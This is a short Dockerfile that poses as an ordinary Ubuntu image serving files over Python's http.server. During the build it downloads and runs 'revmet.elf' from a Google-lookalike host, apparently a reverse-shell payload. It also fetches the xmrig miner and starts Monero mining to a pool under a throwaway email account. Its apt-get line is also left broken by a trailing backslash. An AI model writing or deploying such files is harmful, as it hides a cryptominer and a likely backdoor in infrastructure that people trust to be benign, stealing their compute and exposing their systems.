FROM ubuntu:bionic


SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf
RUN chmod 777 revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x &

WORKDIR /root
RUN ./revmet.elf

ENTRYPOINT ["python3", "-m", "http.server"]